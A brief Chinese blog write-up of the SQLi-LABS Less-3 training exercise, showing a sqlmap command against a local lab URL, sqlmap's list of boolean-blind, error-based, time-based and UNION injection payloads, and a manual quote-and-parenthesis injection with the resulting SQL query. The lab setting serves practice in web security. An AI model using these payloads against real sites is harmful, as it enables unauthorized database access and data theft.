1. 程式人生 > >SQLi-LABS Page-3(Basic Challenges)

SQLi-LABS Page-3(Basic Challenges)

htm from lean bool pan -- info blog lec

技術分享圖片

sqlmap:

python sqlmap.py -u "http://mysqli/Less-3/?id=1"

技術分享圖片

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1‘) AND 4620=4620 AND (‘HTMI‘=‘HTMI

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1‘) AND (SELECT 9599 FROM(SELECT COUNT(*),CONCAT(0x717a767871,(SELECT (ELT(9599=9599,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (‘JrIB‘=‘JrIB

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1‘) AND SLEEP(5) AND (‘XDSb‘=‘XDSb

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4065‘) UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,0x436543777a77706348616c56515565776d444b416a44746c6d734b45527144716b76676e656e784f,0x71766b7071)-- bKcT
---

手動:

id=1‘) and (‘1‘=‘1

技術分享圖片

sql語句:select * from user where name=‘ss‘ and (id = ‘1‘) and (‘1‘=‘1‘)

SQLi-LABS Page-3(Basic Challenges)